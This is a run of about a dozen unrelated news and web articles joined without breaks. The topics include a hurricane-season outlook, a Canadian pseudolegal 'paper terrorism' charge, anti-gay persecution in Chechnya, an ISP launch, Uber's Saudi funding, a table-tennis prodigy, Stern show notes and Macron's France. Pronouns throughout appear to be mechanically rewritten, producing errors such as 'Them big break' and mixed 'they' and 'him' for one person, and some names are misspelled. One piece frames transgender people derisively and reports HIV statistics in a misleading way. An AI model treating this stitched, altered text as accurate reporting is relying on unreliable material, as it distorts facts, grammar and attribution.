In 2016 , five named storms impacted the Southeast U.S. coast , most notably the powerful scraping of the coast from Hurricane Matthew , and its subsequent inland rainfall flooding .
( MORE : Hermine Ended Florida 's Record Hurricane Drought )
Prior to that , the number of U.S. landfalls had been well below average over the previous 10 years .
The 10-year running total of U.S. hurricane landfalls from 2006 through 2015 was seven , according to Alex Lamers , a meteorologist with the National Weather Service . This was a record low for any 10-year period dating to 1850 , considerably lower than the average of 17 per 10-year period dating to 1850 , Lamers added .
Of course , the record-breaking 2005 hurricane season was outside that current 10-year running total . It was also the last season we saw a Category 3 or stronger hurricane ( Wilma ) hit the U.S. , the longest such streak dating to the mid-19th century .
( MORE : 10 Reasons the U.S. Major Hurricane Drought is Misleading )
The bottom line is that it 's impossible to know for certain if a U.S. hurricane strike , or multiple strikes , will occur this season . Keep in mind , however , that even a weak tropical storm hitting the U.S. can cause major impacts , particularly if it moves slowly , resulting in flooding rainfall .
Will El Niño Play a Role ?
As mentioned earlier , El Niño could return at some point during the 2017 hurricane season , but there remains plenty of uncertainty regarding that .
This periodic warming of the central and eastern equatorial waters of the Pacific Ocean tends to produce areas of stronger wind shear ( the change in wind speed with height ) and sinking air in parts of the Atlantic Basin that is hostile to either the development or maintenance of tropical cyclones .
< img class= '' styles__noscript__2rw2y '' src= '' https : //dsx.weather.com//util/image/w/el_nino_explainer.jpg ? v=at & w=485 & h=273 & api=7db9fe61-7414-47b5-9871-e17d87b8b6a0 '' srcset= '' https : //dsx.weather.com//util/image/w/el_nino_explainer.jpg ? v=at & w=485 & h=273 & api=7db9fe61-7414-47b5-9871-e17d87b8b6a0 400w , https : //dsx.weather.com//util/image/w/el_nino_explainer.jpg ? v=ap & w=980 & h=551 & api=7db9fe61-7414-47b5-9871-e17d87b8b6a0 800w '' > The effects of El Niño in the eastern Pacific , Caribbean and western Atlantic Ocean .
NOAA put the odds of El Niño 's development at slightly lower than 50 percent during the summer to fall period , according to their latest update .
Crawford said in The Weather Company hurricane season forecast that the latter portion of the season could be less active if El Niño conditions develop . But it 's unclear how much and how soon any type of atmospheric response there would be if El Niño did materialize .
In the CSU outlook , Klotzbach said there is still considerable uncertainty as to what ENSO conditions will look like during the peak of the Atlantic hurricane season from August-October .
`` Most of the dynamical model guidance is either calling for warm neutral or weak El Niño conditions by the peak of the Atlantic hurricane season , '' wrote Klotzbach .
The most recent El Niño strengthened quickly during the 2015 season , which featured 11 named storms , 4 hurricanes and 2 major hurricanes . Hurricane Joaquin 's prolonged pummeling of the Bahamas was the most notable hurricane that season .
Strong wind shear near the Caribbean Sea and other parts of the Atlantic Basin contributed to the eventual demise of five named storms during the heart of the 2015 season .
Klotzbach found that June through October 2015 Caribbean wind shear was the highest on record dating to 1979 . Klotzbach also said the magnitude of dry air over the Caribbean Sea in the peak season month of August and September also set a record .
Any Other Factors in Play ?
Dry air and wind shear can be detrimental to tropical storm or hurricane development no matter whether El Niño is present or not .
The 2013 and 2014 seasons featured prohibitive dry air and/or wind shear during a significant part of the season , but El Niño was nowhere to be found .
< img class= '' styles__noscript__2rw2y '' src= '' undefined '' srcset= '' undefined 400w , undefined 800w '' > Named storm tracks in the 2016 Atlantic hurricane season .
Sea-surface temperature anomalies may continue to trend upwards as we head into hurricane season due to a change in the weather pattern near the north Atlantic Ocean , according to The Weather Company outlook . This could result in atmospheric conditions becoming more favorable for the development and strengthening of Atlantic hurricanes .
`` The historically-strong negative NAO ( North Atlantic Oscillation ) event in May would suggest further warming of the North Atlantic sea surface temperatures , which is a bullish factor that may cause future forecast numbers to increase a bit , '' Crawford said .
MORE ON WEATHER.COM : Hurricanes From Space - Satellite Imagery
Edmonton police say they are sending a message to people who attempt to use “ paper terrorism ” to subvert the justice system by laying a precedent-setting charge against a self-proclaimed Freeman on the Land .
EPS has charged Allen Boisjoli , 45 , of Vegreville , with intimidation of a justice system participant , following Boisjoli 's alleged reaction to being stopped and issued a speeding ticket by a Community Peace Officer in Beaver County southeast of Edmonton in May 2015 .
Boisjoli filmed the incident and posted it to Youtube .
Boisjoli then launched a campaign of legal filings against the officer . They attempted to file a lien against the officer in Edmonton courts , claiming that the officer was liable for $ 225,000 for detaining them and issuing the ticket .
Speaking about the charge on Tuesday , EPS Det . Rae Gerrard said the “ paper terrorism ” tactics allegedly used by Boisjoli are typical of the Freeman on the Land .
“ They use a plethora of documents , which really mean absolutely nothing , they 're just cutting and pasting from all over the Internet , from all over the world . They put them together in hundreds and hundreds of pages of documents and flood the courts with this , just in an effort to overwhelm the courts and confuse people , ” Gerrard said .
What makes this charge “ precedent setting , ” Gerrard said , is that this is the first time police in Canada have been able to pin a charge to a Freeman based on the practice of trying to overwhelm and intimidate the legal system with filings .
Gerrard said Boisjolis was arrested and charged on Aug. 27 . They said so far Boisjolis has not “ accepted ” the charge , and has not retained a lawyer . Gerrard said they would not be surprised if Boisjolis attempts to subvert the legal process during their own criminal trial , but said that will be up to the justice system to manage .
Boisjoli 's next court appearance is set for Nov. 7 .
In October of last year , a top Alberta judge targeted the Freeman on the Land movement — and Boisjoli — in a decision declaring them to be a “ vexatious litigant . ”
The lengthy and scathing decision by Court of Queen 's Bench Associate Chief Justice John Rooke restricts Boisjoli from filing or continuing actions in all Alberta courts .
“ The restrictions this court places on Boisjoli 's ability to access Alberta courts are unusual and strict , but Boisjoli 's history and their current attempt to misuse court procedure to further a criminal enterprise warrant this intervention , ” said Rooke in the written decision .
According to the decision , Boisjoli tried to enter a default judgment using their own forms , rather than the standard court-supplied ones , while attempting to get out of paying a speeding ticket by claiming the province and the peace officer who issued the ticket owed them a debt .
In their documents , Boisjoli claimed the officer owed them $ 225,000 , which included $ 100,000 for the “ unauthorized use of copyrighted property ( presumably Boisjoli 's name ) ” and $ 5,000 for one hour of unlawful detainment .
Rooke goes on to describe Boisjoli 's pseudolegal attempt to get a default judgment as “ rubbish ” and “ spurious ” and called the letters they sent as part of their scheme as “ nothing more than an irrelevant monologue shouted at a brick wall . ”
Rooke noted that Boisjoli 's documents also included a reference to a Youtube video that appears to be a clandestine recording from inside a Vegreville courtroom in which Boisjoli calls a judge a fraud and orders their arrest .
Rooke also notes Boisjoli has previously been jailed for criminal intimidation and harassment for targeting government workers and they have repeatedly received judicial rulings that their schemes were invalid and frivolous .
“ Boisjoli 's criminal misconduct is far from trivial . ”
Rooke also noted that it appears that Boisjoli was assisted by Edmonton notary Edward J. Powell and said they are “ deeply disturbed ” to see that a notary public has participated in an allegedly criminal enterprise .
In 2012 , Rooke issued a decision that gained national prominence in which they exposed a group they called Organized Pseudolegal Commercial Argument litigants .
In Meads v Meads , Rooke notes the group call themselves various names such as Detaxers , Freemen , Sovereign Men and Church of the Ecumenical Redemption International and base their activities on a common collection of “ conspiratorial , legally incorrect and spurious beliefs . ”
Related
A summary states OPCA litigants deny they have obligations to honour government , courts , contracts and laws and declare themselves exempt from being governed , paying taxes or having motor vehicle licences or insurance .
In June 2015 , Freeman-associated Norman Raddatz , at their west Edmonton home , gunned down Edmonton Police Const . Daniel Woodall before lighting the house on fire and fatally shooting himself .
After the officer 's killing , former Justice and Solicitor General Jonathan Denis noted that they were very familiar with Freeman , having received a threat from one of them during their time as justice minister . It 's not unusual for Freeman to appear in court , they said , consuming valuable police and court resources with frivolous applications that can delay more serious cases .
On Wednesday , Gerrard said Boisjolis is unemployed , and is affiliated with a “ loosely organized ” online group . They said the alleged harassment of the ticketing peace officer has ceased .
Gerrard added that officers in Edmonton are familiar with Freeman tactics , and deal with a “ core of people ” who engage in the refusal to acknowledge any government or licensing authorities .
“ They 're just incredibly difficult to deal with on the roadside , ” they said .
pparsons @ postmedia.com
twitter.com/paigeeparsons
Lyosha Gorshkov was beaten so badly that their face was paralyzed for six months . Gorshkov , a former political science professor , was drinking with friends at a bar when they were pulled out of their seat , thrown to the ground , and curb stomped by a group of men . Gorshkov lost consciousness during the attack , and when they woke up , the men were still beating him , but they could no longer feel the furious blows from their boots due to the shock . When the hospital where Gorshkov was taken reported the incident to Russian police , authorities dismissed the case when they found out that the victim was gay .
“ We 're not going to open up the case because you 're a ‘ faggot , ' ” Gorshkov remembered being told . “ You should blame yourself . ”
Advertisement :
The recent persecution of gay men in Chechnya , a conservative Muslim republic in the Russian Federation , highlights the brutal violence to which LGBT people have long been subjected in the region . Whether it 's the honor killings and concentration camps in Chechnya or a Russian anti-gay propaganda law that makes it difficult to live life openly as a gay person , the current system perpetrates a culture of fear and silence that forces many into the closet . To be outed means risking violence and even death .
Novaya Gazeta , an independent newspaper in Moscow , made international headlines last month when it reported that Chechen police were rounding up gay men in the once war-torn region and throwing them in prison . The news outlet , which has been besieged by threats of violence since the reports went public , estimated that there are six secret detention facilities in the tiny Russian republic .
Ramzan Kadyrov , the Chechen leader known for governing the state with an iron fist , has denied the reports , which include claims of shock treatment and horrific beatings in order to obtain the names of other gay men . A spokesperson for Kadyrov , Alvi Karimov , has claimed that the allegations are an “ absolute lie , ” denying that LGBT people even exist in Chechnya . Karimov said , “ If such people existed in Chechnya , law enforcement would not have to worry about them since their own relatives would have sent them to where they could never return . ”
Chechnya 's minister of the interior has called the reports an “ April Fools ' joke . ”
President Vladimir Putin 's spokesperson has also claimed there 's “ no evidence ” that gay men are being targeted by police , even though their government has been persecuting the LGBT community for years . As LGBT advocates explained , the persecution of LGBT people in Russia is commonplace and it has only intensified under Putin 's watch .
From the Belle Époque to a living hell
Advertisement :
Yury Gavrikov , a gay rights activist in Russia , claimed that things were n't always this way . Sodomy , which had been prohibited under Article 121 of the criminal code , was decriminalized in 1993 by former President Boris Yeltsin . Under the prior law , being found guilty of homosexual acts could result in as much as five years of hard labor . Gavrikov said the 1990s ushered in a new era of relative tolerance . It was common to see openly gay singers and celebrities on television , such as during the country 's annual New Year 's Eve broadcasts . Anton Krasovsky , a former journalist , compared it to France 's Belle Époque .
“ It was years of Russian glamor and big money , ” Krasovsky wrote by email . “ Moscow was a capital of nightclubs and gay life . In Moscow and Saint Petersburg , there were huge gay clubs for thousands people . ”
That changed in 2012 when Putin , who served as president from 2000 to 2008 , came back into power . Putin enacted a law known by the cumbersome title “ For the Purpose of Protecting Children from Information Advocating for a Denial of Traditional Family Values. ” The 2013 legislation , which earned a unanimous thumbs up by the State Duma , banned the spreading of “ propaganda for non-traditional sexual relations ” to minors . Presenting homosexuality as a normal lifestyle acceptable to society would be subject to a fine , and Gorshkov said the state-controlled media began to subsequently brand LGBT people as child predators and rapists .
“ Life in Russia became really hard after 2013 , ” claimed Svetlana Zakharova of the Russian LGBT Network . “ Many open LGBT people were beaten and fired . That 's when the real witch hunts began . ”
Advertisement :
Following the crackdown on gay life in Russia , Gorshkov was forced out of the university job they had held for 13 years . The professor had long been a vocal advocate for LGBT rights , but they began to receive “ physical and verbal threats ” and was targeted by the Federal Security Service , the modern equivalent to the KBG . An agent called Gorshkov into their office one day looking for the names of other gay men , and when the lecturer refused to cooperate , they were followed . A story later circulated on social media that Gorshkov and a male colleague were promoting sodomy at the university .
“ We were all of a sudden treated like enemies of the state , national threats , and spies , ” Gorshkov said .
Krasovsky , who came out during a news broadcast in protest of the anti-LGBT laws , claimed that in Russia it 's always been “ difficult to live openly , freely , and brightly , ” even during the relative freedom of the 1990s . Same-sex couples have never had the luxury of holding hands in public in a country where legislators have banned pride parades for a century .
Advertisement :
But L.P. , who left Russia to escape its culture of persecution , explained that the recent laws have forced LGBT people underground .
“ Clubs are located in industrial zones on the outskirts of the city , ” said L.P. , who requested anonymity for fear of their safety . “ These are not the kinds of establishments that you can easily see on the street — sitting next to McDonald 's or Starbucks . It 's horrifying , totally degrading and humiliating . ”
The iron fist of Putin 's strongman
Advertisement :
If being lesbian , gay , bisexual or transgender in Russia was already difficult enough under Putin 's rule , Kadyrov has made these struggles even worse .
In 2007 Putin appointed Kadyrov as the president of the Chechen republic , which enjoyed a brief period of independence from Russia until the Second Chechen War in 2000 . Rachel Denver , the deputy director for Europe and Central Asia at Human Rights Watch , said that Putin installed Kadyrov , who actually had fought against Russia in the First Chechen War , to deal “ very harshly with the militant insurgency. ” Denver claimed that to wipe out the independence movement Kadyrov has treated Chechnya “ like their own personal dictatorship , ” deploying an “ extreme form of tyranny . ”
“ He rules above the law , ” Denver said . “ Many of the practices that take place in Chechnya violate Russian laws . Only he 's allowed to get away with them . ”
Although the recent Novaya Gazeta investigation shined a light on the police detainment of gay men in Chechnya , Denver claimed this is not a new phenomenon . They alleged that it 's been “ going on for years. ” Law enforcement officials in Chechnya frequently blackmail gay men , often videotaping them as authorities force prisoners to admit to homosexual acts , they said .
Advertisement :
Gorshkov said , though , that the men on these tapes are not always gay . They claimed that the state often rounds up its political enemies — including “ NGO leaders , community leaders , and business leaders ” — and obtains false confessions through torture .
“ This video will be sent to their families , and they will be shamed publicly , ” Gorshkov said .
These routine outings of gay men and political dissidents , as Denver explained , can be deadly in a “ very traditional Muslim society ” where LGBT people are considered a “ stain on the family honor. ” The public humiliation of having a gay family member can lead to complete and total ostracism for an entire household . If a woman is engaged to be married and their brother is gay , the future husband 's family may oppose the match until the family is cleansed of this embarrassment .
“ The Chechen authorities exploit that , ” Denver said . “ After they detain and torture these men , they release them to their families , saying , ‘ He 's gay , you know what to do . ' The assumption is that they will commit an honor killing . ”
Advertisement :
Gorshkov said that gay men in Chechnya are often forced into an impossible situation . Either they stay in the region , marry a woman , and remain in hiding for the rest of their life — but always fearing what could happen if someone discovered their secret — or move to a more accepting area of the country , like Moscow or St. Petersburg . But even if they make it out of Chechnya , that does n't mean they wo n't be followed , with an attempt made to kill them , they claimed . Gorshkov , who now serves as the president of RUSA LGBT , said that they have been in touch with a transgender woman whose relatives cut out their breast implants when they tried to flee home .
“ When men flee to other places in Russia , they 're not necessarily safe from their families , ” Denver continued . “ But they 're also not necessarily safe from police . Kadyrov has very long arms . If they want to find someone , he 'll find them . ”
Gaining safe passage out of Russia
Although Novaya Gazeta has estimated that as many as 20 men have been killed by Chechen authorities , LGBT advocates in Russia and abroad are working to try to make sure that the death toll does n't continue to rise .
Advertisement :
Zakharova said of the 75 people who have contacted the Russian LGBT Network through its hotline , the group is now providing material support to 30 people . That includes helping to evacuate them from Chechnya . Rainbow Railroad , a nonprofit based in Toronto , is assisting gay men in obtaining visas to countries like Canada or the United States . The organization also helps LGBT Russians with the difficult process of claiming asylum , one that has become more arduous in the U.S. under the new presidency . Although U.N . Ambassador Nikki Haley has condemned the detainment of gay men in Chechnya , Trump has remained silent .
“ The work we do is like a triage , ” said Kimahli Powell , the executive director of Rainbow Railroad . “ We can lead people to a place that 's safe , let them know what to do when they land , and give them organizations that are safe in the country that they arrive to . ”
Rainbow Railroad 's efforts received a huge boost last week after Facebook helped raise more than $ 110,000 to help finance the organization 's mission . Powell , though , said that LGBT advocacy groups will continue to face a major uphill battle in an environment where many persecuted gay men may not have the ability to safely contact international aid organizations , especially if they 're being watched by authorities . “ We 've had difficulty identifying cases , ” Powell said .
It 's become even more critical for groups like Rainbow Railroad to help LGBT people gain safe passage out of Chechnya following reports that Kadyrov plans to escalate their campaign against gay men . Alan Duncan , a British foreign minister , has claimed that the Chechen president “ wants the [ LGBT ] community eliminated by the start of Ramadan , ” which starts on May 26 . Although Duncan claimed to have had numerous meetings with Russia 's deputy foreign secretary , Vladimir Titov , the Kremlin has yet to respond to the new allegations .
Advertisement :
Kadyrov denied the claims , calling them “ provocative ” and a “ massive information attack , ” even as many gay men in Chechnya remain missing .
Will Putin 's government take action to address a crisis that , in many ways , stems from problems created by their own regime ? LGBT advocates likely got their answer on Monday when protesters in St. Petersburg , who came out to march on the Anichkov Bridge in the city 's center , were apprehended and detained by police dressed in riot gear . Reports indicated that at least 10 people were arrested , and press photos showed law enforcement officials dragging LGBT rights activists away as they lay in the street wrapped in rainbow flags . It 's just another day in Vladmir Putin 's Russia .
Webber first attempted to land what many said was `` the impossible trick '' while driving for Mercedes-Benz in 1999 . Sadly , things did n't go their way , as their CLR-GT1 was blown slightly askew , and they did n't quite `` stick '' the landing .
Webber gave another attempt at the feat in 2010 during the Valencia Formula 1 street circuit race . However , without the big hill on the Mulsanne straight to use as a launching pad , Webber had to use the back of Heikki Kovalainen 's Caterham as their spring board .
Once again , close , but no cigar , as Webber landed upside-down , before rolling back topside . Their Red Bull team was clearly disappointed the full rotation was n't completed , and were visibly disheartened for the remainder of Webber 's F1 career .
Porsche And Webber Confident They Can Complete Trick Safely And Successfully
First attempted by Yannick Dalmas at the 1998 Petit Le Mans while driving a Porsche GT1 . Porsche , Webber and the entire LMP1 team are dedicated to completing this endeavor successfully . Webber was quoted as saying they think the 919 Hybrid offers them their best chance yet of safely completing the flip . Porsche execs have urged them to keep training for the big day , and have continued to encourage them through several failed attempts in the simulator .
With Porsche on their side , Webber might just be the guy to do the impossible and stick the landing on the motorsport back-flip , and vice versa . Here 's hoping the judges like their technique .
Other Porsche Blog Posts You Will Enjoy
Porsche April Fools ' Day Round-up
Mydaily via Nate1 . [ +221 , -14 ] I would n't renew either2 . [ +185 , -24 ] Childish3 . [ +167 , -26 ] You can see that Yang Hyun Suk is trying to reflect the public 's opinion in their business decisions lately~ I think he 's finally growing as a business owner compared to the past . All they did before was shielded no matter what scandals their artists got into but Yang Hyun Suk 's been the complete opposite lately , the most recent example being Se7en ... their contract was n't renewed after all of their scandals .. and Park Bom and Seungri have renewals coming up too . Honestly , all because of that one person Park Bom .. the entire agency is suffering in the comments section . Let 's watch over what he 'll do this time.4 . [ +33 , -6 ] Park Bom at least sings well , I do n't even know why Seungri was chosen when you compare their looks and talents to current idols5 . [ +30 , -4 ] Of course he 's got ta throw away that plastic druggie Park Bom and Hentai Seungri , why not mari-Dragon too ? But then again , mari-Dragon is their cash cow ... 6 . [ +24 , -7 ] I do n't think he 's accepting public opinion but rather kicking out the members who do n't make them any money and get a bunch of hate ... If they were reflecting public opinion , he 'd start by kicking GD.7 . [ +22 , -2 ] He 's already sucked them dry , they have no use for them anymore . Hard to recover their images and they ca n't handle them anymore so of course he 's throwing them out ㅋㅋㅋ8 . [ +19 , -1 ] The two members causing the most damage in their respective groups . When Yang Hyun Suk asked Seungri why they wanted to join Big Bang in their pre-debut documentary , Seungri looked so desperate but now he 's lost their roots ㅠ9 . [ +13 , -3 ] Seungri is honestly not needed in Big Bang . YG 's worst decision ever was casting Seungri and the luckiest artist in YG is Seungri.10 . [ +12 , -7 ] And here confirms 2NE1 's disbandment11 . [ +11 , -0 ] What 's funny is that the day they unfollowed them , Sandara Park commented on Yang Hyun Suk 's instagram asking them to follow them and they followed them instantly then unfollowed Seungri and Park Bom .
Singaporean boutique ISP , ViewQwest , has announced that it has entered the Malaysian market via a joint partnership with local telecommunications engineering services company , Televenture Sdn Bhd .
If the ViewQwest name sounds familiar , that 's because the ISP made huge waves in late 2014 when it announced a fibre Internet plan in Singapore with speeds peaking at 2Gbps at a time when the fastest fibre Internet plan in Malaysia only maxed out at 100Mbps .
( Image credit : Aloysius Low @ CNET )
The Malaysian operations will be known as ViewQwest Sdn Bhd , and has actually begun operations . According to Singaporean daily Straits Times , ViewQwest had been rolling out its fibre network in key business districts in Malaysia , and today it currently owns 100km fibre optic cables spread across three key locations : the Golden Triangle , Bangsar South , and Cyberjaya .
A conversation with PR represenatives of ViewQwest also confirms that while there are currently no consumer-level Internet plans are available , corporate plans are already available in selected commercial buildings in Bangsar South .
For Malaysian consumers , ViewQwest Sdn Bhd is aiming to roll out its 1Gbps fibre Internet plans by the end of this year . Of course , the coverage will be limited to residential areas within the vicinity of the three business districts mentioned above .
ViewQwest will also roll out its Freedom DNS service that will be packaged alongside the Android-based ViewQwest TV media player . Both products will be bundled with every subscription to ViewQwest 's fibre Internet services . Freedom DNS in the media player will allow unrestricted access to various video streaming services including Amazon Prime Video , Hulu , BBC iPlayer , and HBO Now .
The arrival of ViewQwest comes at a time when local ISPs have not yet breached the 1Gbps mark . The fastest consumer package available maxes out at 500Mbps from Time Fibre ( RM299 per month ) , though it is also geographically limited to selected high-rise buildings around the Klang Valley , Penang , and Johor .
The country 's largest ISP , TM , retains a major market share of fibre Internet users in Malaysia . Its highest-speed package is capped at 100Mbps , and is priced at RM399 per month .
In comparison , ViewQwest 's fibre Internet plans in Singapore start from as low as S $ 49.90 ( about RM150 ) per month for the 1Gbps option , while the 2GB fibre plan has a starting subscription price of S $ 69.90 ( about RM210 ) per month .
( Featured image credit : The Straits Times )
299 81 13 62 9 27
Uber just banked $ 3.5 billion from Saudi Arabia 's investment fund .
The deal marks the company 's biggest cash influx from a single investor .
The money comes from the country 's Public Investment Fund . It wo n't change Uber 's valuation , which remains at $ 62.5 billion . It is the most valuable startup in the world
With the cash , Uber also added a new member to its board : Public Investment Fund managing director Yasir Al Rumayyan .
Related : Uber launches in Pakistan
`` We 've seen first-hand how this company has improved urban mobility around the world and we 're looking forward to being part of that progress , '' said Al Rumayyan in a statement sent to CNNMoney . He 'll join the likes of Arianna Huffington on the board .
Uber has been operating in Saudi Arabia since 2014 .
According to Uber , 80 % of its customers in Saudi Arabia are women , since women are not allowed to drive themselves .
In a statement , Uber CEO Travisk Kalanick called the investment a `` vote of confidence '' in the company , noting that Uber looks forward to partnering on Saudi Arabia 's economic and social reforms .
Saudi Arabia 's 2030 vision , delivered by Deputy Crown Prince Mohammed bin Salman , aims to reduce the country 's dependence on oil , its unemployment rate and its workforce inequality .
Uber sees itself as helping the country in that quest . The Middle East marks a big growth area for Uber , which announced in November that it was investing $ 250 million in the Middle East and North Africa . Uber currently operates in nine countries and 15 cities in the region .
Related : Uber is testing its first self-driving car
Uber said that it now has more than 395,000 riders who actively use its platform in the Middle East , as well as 19,000 drivers .
As Uber expands to new markets , it adapts its product to fit the lifestyles of locals .
Last year , it rolled out a cash payment option in some markets , including Jeddah and Riyadh , Saudi Arabia .
Not to be outdone , Uber 's big Chinese rival Didi Chuxing said that its current funding round , which includes a $ 1 billion investment from Apple , will be bigger than $ 3.5 billion .
Didi President Jean Liu made the comments Wednesday at the Code Conference in California , but the company has n't yet put a specific number on the fundraising 's total .
-- Brian Stelter and Sophia Yan contributed to this report .
They do n't spin on Shabbos .
Ping-pong prodigy Estee Ackerman , an 11-year-old from Long Island , was disqualified from their final event at the 2012 US National Table Tennis Championships in Las Vegas last Dec. 21 when their match fell on the Jewish holy day of rest and they chose not to play .
“ I advanced in my round robin and then we looked at my schedule and saw the next match would be during Friday night , which is our Sabbath , so of course I 'm disappointed , ” Estee told The Post .
“ I practiced and trained for six months for this , ” the sixth-grader from West Hempstead said . “ Ping pong is important to me , but my religion of Judaism is also very important to me . ”
Estee is currently the No . 4 ranked player in the 8-to-11 age bracket , although in the world of competitive ping pong they often challenge and whoops players in their 20s and 30s .
“ She had a Shabbos-over-sports moment , ” said their father Glenn Ackerman , a funeral-home director . “ She had to withdraw from the event as tournament officials would not reschedule it for after shabbos . ”
Ackerman spends hours almost daily training with their daughter , whom they bill as one of the country 's biggest up-and-coming Jewish athletes .
“ Hopefully , other Jewish athletes will also look to Estee to pursue their dreams in whatever sport they choose , ” they said .
Neither Glenn nor Estee hold ill will toward the USA Table Tennis , the sport 's governing body , because there were nearly 800 players to schedule over the five-day event .
“ We clearly try to be inclusionary in the manner in which we run our events , ” said Michael Cavanaugh , CEO of the USA Table Tennis . “ Estee entered eight events and played to completion in all but one of them . ”
Fortunately , the last event they had to miss had little impact on their ranking .
Since they were little , Estee has practiced almost daily — except on the Sabbath , of course — while attending a local yeshiva .
Them big break came in July during a tournament in Grand Rapids , Mich. , when they were discovered by professional player Biba Golic , the top celebrity endorser of the Killerspin line of ping-pong products .
“ She 's the real deal , that 's for sure , ” Golic told The Post . “ We were looking at prospective kids and suddenly noticed this little girl . They instantly caught our eye . You could see their character immediately . ”
They saw them play an adult man .
“ Tactically and strategically they have a natural sense for the game , ” Golic said . “ When you start to play against a 30-year-old guy the natural reaction for a girl is to get scared and they were not taken by fears . They were just playing their game and beating this guy . ”
At their tender age , Estee now has a sponsorship from Killerspin and is an official member of the “ Killerspin Krew. ” The company has flown them around the country for exhibition events and Golic is mulling sending them to China for a summer of intense training .
Already , Estee has their eyes on joining the US Olympic table tennis team — an event that the US has never once medaled in .
“ I hope to try out for the Olympic team and one day bring back a medal for my country , ” Estee said .
A new study from the World Health Organization shows how dangerous it is to become “ transgender . ”
The WHO performed a meta-analysis of 15 different countries and found that men who dress as women are 49 times more likely to contact the HIV virus than the general population . Men who dress as women and also prostitute themselves are nine times more likely to contract HIV than those who do not prostitute themselves .
Such devastating news is never included in the “ transgender ” narrative that is sweeping American culture , including the school system . Breitbart News reported this week about a school system in Wisconsin that tried to feature the book I am Jazz , an illustrated children 's book that tells the story of a gender confused 15-year-old boy who has become one of the breakout stars in the trans firmament . The school board makes the claim that a boy can have a girl brain , something not supported by science .
What is not discussed with school children or anyone else is the dark-side of the trans world . Walt Heyer , who lived for years as a woman , hosts a website called “ Sex-Change Regret ” that tells the horror stories of those who have tried to live the trans life .
Dr. Paul McHugh , former chief psychiatrist at Johns Hopkins University and the man who shut down Johns Hopkins ' renowned sex change unit , cites a study performed by the National Institute of Health that found the suicide rate among men who live as women , even in trans-friendly Sweden , is significantly higher than the general population .
Noted sex researcher Dr. Ray Blanchard hypothesizes there are two essential types of men who dress as women and who seek bodily changes through drugs or surgery . The first are “ transsexual homosexals ” who want to sexually attract other men . The second are what they call “ autogynephilic transsexuals ” who derive sexual pleasure from appearing to be women . Given the hipness of transsexualism with people like Caitlyn Jenner and Jazz Jennings , there might be a third category , especially among children , and that is fashion .
Paul McHugh says these urges grow out of psychological disturbances that are not solved through dressing up or through surgery . Walt Heyer , through their anecdotal work among those who regret their transsexualism , would agree .
Follow Austin Ruse on Twitter @ austinruse
Stern Show This Week
Week of 2.11.19 Presidents ' Day Vacation Week Days Check out Marksfriggin.com and then look up movies and shows mentioned alphabetically at the top of this page .
Week of 2.4.19
Howard still loves Gotham . Jon Hein loves The Kaminski Method and The Good Fight . Howard said Sal 's dad is straight out of the Sopranos . Lots of Bachelor talk . Richard Christy was too angry their team did n't make the Super Bowl , so they refused to watch the game . They said they watched The Goonies instead .
Week of 1.28.19
David Alan Grier was in studio . He 's in the new show , The Cool Kids . Howard used to love them on In Living Color . Talked about their impression of Ike Turner and the movie What 's Love Got To Do With It ? Howard said they worry that other guys are always jealous when they see them out with Beth , so he 's gon na start having them wear a fat suit when they go out , like it Shallow Hal .
Week of 1.21.19 Off for Martin Luther King Jr. Day . Replay of Howard 's 60 's Birthday Bash .
Howard said they like the female agent on The Punisher . Ralph said they 're going to make a prequel to the Sopranos , with James Gandolfini 's son .
Week of 1.14.19
Bachelor and Celebrity Big brother talk . Comedian Sebastian Maniscalo was in studio . He 's in the Green Book .
From Marksfriggin.com : Howard said they have to see that new Keanu Reeves movie Replicas . JD said it 's not getting good reviews . Howard said they bet John Wick does n't either . JD said they think it did . Howard took a call from a guy who asked if they 're going to see the new M. Night Shyamalan movie ” Glass. ” Robin said they were trying to get Howard to watch Split but they have n't done it yet . Howard said they have things to do . They said they like M. Night and they were on the show years ago . They said they like their movies . Howard asked where they can see Split . Robin said you can stream it . They said it 's probably on Apple TV or something . Robin said they loved that movie . Howard told Gary to write that down for him . Howard said Glass has 38 percent on Rotten Tomatoes . Robin said that does n't mean anything . They said they have n't seen Glass yet but they did love Split . Howard said the caller says they love it . The guy said they did . Robin said it goes back to Unbreakable and Howard did love that . Howard said they did .
Week of 1.7.19
Howard still loves Gotham , the Bachelor and The Flash . John Hein likes The Kaminski Method and The Good Fight . Sal 's dad sounds like the guy out of the Sopranos . A caller said that the story in Bohemian Rhapsody is much like Howard Stern 's Private Parts . Howard said he 's heard that before . Robin watched Surviving R. Kelley and said it was really good . Lindsay Lohan was in studio and Howard said that when their kids were young and they were going through their divorce , they would put on Parent Trap and their kids would shut the fuck up . Howard and Robin love Mean Girls .
From Marksfriggin.com : Howard took a call from a guy who was n't paying attention to the phone . They were talking to someone at work or something . Howard asked why people call them and do n't get on the line . Howard kept saying hello but the guy was n't listening . Howard asked the guy what they were doing . The caller said it was the inner workings of their work place . Gary asked if they work at their house because they heard a door bell . Howard said that was a bell to warn them of different ethnic groups… John Hein says Patriot is good . They said they loved to Escape at Dannemora too…Howard said they were researching it and tried to figure out who ripped off who between ” A Quiet Place ” and ” Bird Box. ” They said the Bird Box book was out before John Krasinski 's movie .
The caller asked if they are worried about the Bachelor being too cheesy this season . Howard said that 's what they like about that show . They said they do n't watch Love Island . They said they like Paradise and The Bachelor . Howard said they have watched that show and it 's horrible . Gary said there 's a woman on the show who is faking the Australian accent . They said it 's pretty funny .
Archives
IMDB-a Home
Image by David Glantz @ DavidGlantz3Talking of JD going out to dinner and eating antelope and other assorted endangered species :
Image by David Glantz
@ DavidGlantz3
@ DavidGlantz3
Week of 4.3.17
Archives
IMDB-a Home
IT IS remarkable what a difference a single election can make . “ The way Europe is regarded by the rest of the world has changed in a few months , ” says Gérard Mestrallet , chairperson of both Engie and SUEZ , two big French energy firms , and a board member at Siemens of Germany , the region 's biggest engineering firm . The arrival of Emmanuel Macron as France 's reform-minded new president—his party is set for a giant victory in parliamentary elections this week—is helping to transform attitudes from gloom to cheer .
Mr Mestrallet echoes many corporate leaders in describing “ real hope and enthusiasm ” , amid expectations that the new president will , within months , “ de-block ” the euro zone 's second-largest economy . Mr Macron will start freeing business activities , they say , first with legislative reform of a rigid labour market to simplify rules on hiring and firing , and then by cutting tax rates ( the corporate kind will fall from 34.4 % to 25 % ) . Measures to boost entrepreneurship and young technology firms are also expected . This may all sound over-optimistic , but Mr Mestrallet merely captures an ebullient mood that is spreading across Europe .
Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor 's Picks .
